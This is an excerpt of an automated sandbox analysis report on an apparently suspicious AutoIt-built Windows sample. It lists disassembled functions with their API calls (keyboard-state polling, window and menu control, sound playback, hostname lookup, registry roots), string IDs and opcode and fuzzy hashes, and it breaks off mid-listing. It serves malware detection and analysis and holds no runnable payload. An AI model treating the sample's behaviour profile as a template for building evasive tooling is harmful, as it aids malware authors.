                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                            • API String ID: 3964851224-909552448
                            • Opcode ID: 905412bd89841a448e87cf93e1981bead286b4ed72aab9257b1ca8bec592da94
                            • Instruction ID: d872f77dbae95cddf72fe1209dbfec8e4567be0d0172478564e4cd662368eae6
                            • Opcode Fuzzy Hash: 905412bd89841a448e87cf93e1981bead286b4ed72aab9257b1ca8bec592da94
                            • Instruction Fuzzy Hash: 2441AF341002869FDF44EF05D945AEB3BA1BF15390F644864ECA17B296DB30EE4ADB50
                            Function 000C83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000C843F
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000C8455
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000C8466
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000C8478
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000C8489
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: SendString$_memmove
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 2279737902-1007645807
                            • Opcode ID: fa5d8ed7273f4f5653f76093e6d12fd58299bed2ff8d660a36c86c5b308e2e0b
                            • Instruction ID: ca8b54b07e015a3603ba4877d06f0619e33f8c5ef5c95492fac43a43eaa54b58
                            • Opcode Fuzzy Hash: fa5d8ed7273f4f5653f76093e6d12fd58299bed2ff8d660a36c86c5b308e2e0b
                            • Instruction Fuzzy Hash: 2C118F61A4025979D724B7A1CC4AEFF7BBCFBD1B00F444929B461E20D6EFA05A44C7B4
                            Function 000C8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • timeGetTime.WINMM ref: 000C809C
                              • Part of subcall function 0009E3A5: timeGetTime.WINMM(?,75A8B400,000F6163), ref: 0009E3A9
                            • Sleep.KERNEL32(0000000A), ref: 000C80C8
                            • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 000C80EC
                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 000C810E
                            • SetActiveWindow.USER32 ref: 000C812D
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000C813B
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 000C815A
                            • Sleep.KERNEL32(000000FA), ref: 000C8165
                            • IsWindow.USER32 ref: 000C8171
                            • EndDialog.USER32(00000000), ref: 000C8182
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                            • String ID: BUTTON
                            • API String ID: 1194449130-3405671355
                            • Opcode ID: f4569ed6af71b0c5d2747780cd34a2a17afc676ab84b342163bb37d9faa70a8f
                            • Instruction ID: 82fa609361464583b0cecce9c88a3fb2d6225f1133ee436d3291519c9168b9dd
                            • Opcode Fuzzy Hash: f4569ed6af71b0c5d2747780cd34a2a17afc676ab84b342163bb37d9faa70a8f
                            • Instruction Fuzzy Hash: EC219274204204BFE7225BA1EC8AF6A3BAAF745398F0D4118F96182DB1CFB24D858725
                            Function 000C32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000F3C64,00000010,00000000,Bad directive syntax error,0011DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 000C32D1
                            • LoadStringW.USER32(00000000,?,000F3C64,00000010), ref: 000C32D8
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • _wprintf.LIBCMT ref: 000C3309
                            • __swprintf.LIBCMT ref: 000C332B
                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000C3395
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            • API String ID: 1506413516-4153970271
                            • Opcode ID: 2e1fbd22bda76aeadf040001b995e6d76c0eed2e305fd849b74d975bdea7097c
                            • Instruction ID: ab2a591358b99b21b708e7122a1e94983bcf0c87435d7c82763b7af65442fc06
                            • Opcode Fuzzy Hash: 2e1fbd22bda76aeadf040001b995e6d76c0eed2e305fd849b74d975bdea7097c
                            • Instruction Fuzzy Hash: F0216832840219ABDF11FFD0CC0AEEE7735BF14701F008465F555A10A2EBB2AB58DB61
                            Function 000C78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 208665112-3771769585
                            • Opcode ID: a2c38f0376363e521030d52e1669fc1868a8799648c20cf469f446c842fc332e
                            • Instruction ID: 2ee343effc000a2a682fbdeea0edafd9b152ddf7a1e539bc7c3a773eb6ee075e
                            • Opcode Fuzzy Hash: a2c38f0376363e521030d52e1669fc1868a8799648c20cf469f446c842fc332e
                            • Instruction Fuzzy Hash: E611B471908115ABDB64A7B0AC4AFEE77BCDF45724F0000A9F44996092EFB0DA818AA5
                            Function 000D08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                            • String ID:
                            • API String ID: 3566271842-0
                            • Opcode ID: 6b71ef48204d17b6d6fe61702d00fce4721e803033333bfb4705c859ddecf162
                            • Instruction ID: 641ac1f0672fb2b41c77cca947eaddbe52d9b60d34c08b9e2d78ec7497e22e26
                            • Opcode Fuzzy Hash: 6b71ef48204d17b6d6fe61702d00fce4721e803033333bfb4705c859ddecf162
                            • Instruction Fuzzy Hash: 1D711C75900219AFDB14EFA4D888ADEB7B8FF49314F048096E949AB252D770EE40CF90
                            Function 000C388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 000C3908
                            • SetKeyboardState.USER32(?), ref: 000C3973
                            • GetAsyncKeyState.USER32(000000A0), ref: 000C3993
                            • GetKeyState.USER32(000000A0), ref: 000C39AA
                            • GetAsyncKeyState.USER32(000000A1), ref: 000C39D9
                            • GetKeyState.USER32(000000A1), ref: 000C39EA
                            • GetAsyncKeyState.USER32(00000011), ref: 000C3A16
                            • GetKeyState.USER32(00000011), ref: 000C3A24
                            • GetAsyncKeyState.USER32(00000012), ref: 000C3A4D
                            • GetKeyState.USER32(00000012), ref: 000C3A5B
                            • GetAsyncKeyState.USER32(0000005B), ref: 000C3A84
                            • GetKeyState.USER32(0000005B), ref: 000C3A92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 5a865a97195255de898526649214f08c05f65cbc03a5e5e3f9e513393216362c
                            • Instruction ID: cedf79f6d2004abc0919800e8ad007a22f009cff6b86176c5923aeb1345d8127
                            • Opcode Fuzzy Hash: 5a865a97195255de898526649214f08c05f65cbc03a5e5e3f9e513393216362c
                            • Instruction Fuzzy Hash: 2851A420A1478469FB75EBA48811FEEBBF49F11344F08C59ED5C25A1C3DAA49B8CC762
                            Function 000BFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 000BFB19
                            • GetWindowRect.USER32(00000000,?), ref: 000BFB2B
                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000BFB89
                            • GetDlgItem.USER32(?,00000002), ref: 000BFB94
                            • GetWindowRect.USER32(00000000,?), ref: 000BFBA6
                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000BFBFC
                            • GetDlgItem.USER32(?,000003E9), ref: 000BFC0A
                            • GetWindowRect.USER32(00000000,?), ref: 000BFC1B
                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000BFC5E
                            • GetDlgItem.USER32(?,000003EA), ref: 000BFC6C
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000BFC89
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 000BFC96
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            • Opcode ID: 843ff38bd44427cb131b0fb8273ca0eda1fbf15e98ea254c1f534fa6e7cfdba0
                            • Instruction ID: 645e97847cd4db830724c0063f20df05fc66b2e05acb4243780f2349a29be392
                            • Opcode Fuzzy Hash: 843ff38bd44427cb131b0fb8273ca0eda1fbf15e98ea254c1f534fa6e7cfdba0
                            • Instruction Fuzzy Hash: 92510F71B00209AFDB18CFA9DD95ABEBBBAFB88310F148139F915D7691D7B19D408B10
                            Function 0009B86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000849CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00084954,00000000), ref: 00084A23
                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0009B85B), ref: 0009B926
                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 0009B9BD
                            • DestroyAcceleratorTable.USER32(00000000), ref: 000FE775
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 000FE7A6
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 000FE7BD
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B85B,00000000,?,?,0009AF1E,?,?), ref: 000FE7D9
                            • DeleteObject.GDI32(00000000), ref: 000FE7EB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                            • String ID:
                            • API String ID: 641708696-0
                            • Opcode ID: 213242d82be573809fbb9873604f0d28c5881870f37487220602967ee0698eed
                            • Instruction ID: ff56f14fbe79d0140aec27b1cc4e1cbd67d087de96b6e07e2a84deec929bf653
                            • Opcode Fuzzy Hash: 213242d82be573809fbb9873604f0d28c5881870f37487220602967ee0698eed
                            • Instruction Fuzzy Hash: 1D618C34110706DFDB35AF69EA88B39B7F5FB46321F104519E29686D70CB70A8D1EB40
                            Function 0009B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009B155: GetWindowLongW.USER32(?,000000EB), ref: 0009B166
                            • GetSysColor.USER32(0000000F), ref: 0009B067
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ColorLongWindow
                            • String ID:
                            • API String ID: 259745315-0
                            • Opcode ID: 7d2c5e7190c2853a9b7c53f325f5c356fda323ec52308ec6bf32fd718ac45bba
                            • Instruction ID: 8297932b145eb600d632915545a2e3b44f2f30994100446df648d34b0fc83115
                            • Opcode Fuzzy Hash: 7d2c5e7190c2853a9b7c53f325f5c356fda323ec52308ec6bf32fd718ac45bba
                            • Instruction Fuzzy Hash: C141C431100154AFDF205F78ED88BBA3BA5AB46730F144361FEB58A5E2C7718C81EB21
                            Function 000C7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                            • String ID:
                            • API String ID: 136442275-0
                            • Opcode ID: a69738df2aca275a7f1b492e3f0c115ae816235bb0b211c8946ab37b263f2381
                            • Instruction ID: 191d148c8cd2a89ca2e8d16d67eca468ee211d034ce57a9947ec14cb5eb8c29e
                            • Opcode Fuzzy Hash: a69738df2aca275a7f1b492e3f0c115ae816235bb0b211c8946ab37b263f2381
                            • Instruction Fuzzy Hash: 7041FCB290412CAADB65EB90DC55EDF73BCAB09310F1041E6B519A2052EB71ABD4CFA4
                            Function 000884A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                            Download Yara Rule
                            APIs
                            • __swprintf.LIBCMT ref: 000884E5
                            • __itow.LIBCMT ref: 00088519
                              • Part of subcall function 000A2177: _xtow@16.LIBCMT ref: 000A2198
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __itow__swprintf_xtow@16
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 1502193981-2263619337
                            • Opcode ID: f849a9570708a0a33a2b2bfcc4aa47e8bb6af46cd02a59b8247dcaaf1bb0caba
                            • Instruction ID: e642d4d23597051ad5ade35f501b74eb0291be063dd81f21d1c55164df1dcb57
                            • Opcode Fuzzy Hash: f849a9570708a0a33a2b2bfcc4aa47e8bb6af46cd02a59b8247dcaaf1bb0caba
                            • Instruction Fuzzy Hash: 8F41D372600A099BDB24EF78DC41EBA77E9BF45310F60846EE689D7192EA31DA41DB10
                            Function 000A5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000A5CCA
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • __gmtime64_s.LIBCMT ref: 000A5D63
                            • __gmtime64_s.LIBCMT ref: 000A5D99
                            • __gmtime64_s.LIBCMT ref: 000A5DB6
                            • __allrem.LIBCMT ref: 000A5E0C
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A5E28
                            • __allrem.LIBCMT ref: 000A5E3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A5E5D
                            • __allrem.LIBCMT ref: 000A5E74
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A5E92
                            • __invoke_watson.LIBCMT ref: 000A5F03
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                            • String ID:
                            • API String ID: 384356119-0
                            • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                            • Instruction ID: fd88dfd821e0212eadb48daab56d0ab04331dd9e555273c81a312013f093d32c
                            • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                            • Instruction Fuzzy Hash: 8871C871A01B16ABD724DFB8CC42BEA73E8BF12765F158129F514D7682EB70DE408B90
                            Function 000C57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000C5816
                            • GetMenuItemInfoW.USER32(001418F0,000000FF,00000000,00000030), ref: 000C5877
                            • SetMenuItemInfoW.USER32(001418F0,00000004,00000000,00000030), ref: 000C58AD
                            • Sleep.KERNEL32(000001F4), ref: 000C58BF
                            • GetMenuItemCount.USER32(?), ref: 000C5903
                            • GetMenuItemID.USER32(?,00000000), ref: 000C591F
                            • GetMenuItemID.USER32(?,-00000001), ref: 000C5949
                            • GetMenuItemID.USER32(?,?), ref: 000C598E
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C59D4
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C59E8
                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C5A09
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                            • String ID:
                            • API String ID: 4176008265-0
                            • Opcode ID: 6a299100a7fb43875d177a2bd3f461eb7e6c83cd382ebac2b9ca33ff965577b8
                            • Instruction ID: 828428f900a92d2cad5a810672abe3e24ba63df718da4be3d001847f55cf744b
                            • Opcode Fuzzy Hash: 6a299100a7fb43875d177a2bd3f461eb7e6c83cd382ebac2b9ca33ff965577b8
                            • Instruction Fuzzy Hash: 02619D78900A49EFDB20CFA4DC88FAE7BB8EB05359F14015DF882A3251D771AD85CB21
                            Function 000E9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000E9AA5
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000E9AA8
                            • GetWindowLongW.USER32(?,000000F0), ref: 000E9ACC
                            • _memset.LIBCMT ref: 000E9ADD
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000E9AEF
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000E9B67
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow_memset
                            • String ID:
                            • API String ID: 830647256-0
                            • Opcode ID: c16988c9ebe178db197f60ddc07f6f737e05ab036165d9eb0ac807864654abee
                            • Instruction ID: 3227de8525768ef54326161edaca199e6167fc1d4e0b5816ff297e493ce59396
                            • Opcode Fuzzy Hash: c16988c9ebe178db197f60ddc07f6f737e05ab036165d9eb0ac807864654abee
                            • Instruction Fuzzy Hash: 40616B75A00248AFDB21DFA4CD81EEE77F8EF09700F14015AFA15E72A2D770A981DB90
                            Function 000C3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 000C3591
                            • GetAsyncKeyState.USER32(000000A0), ref: 000C3612
                            • GetKeyState.USER32(000000A0), ref: 000C362D
                            • GetAsyncKeyState.USER32(000000A1), ref: 000C3647
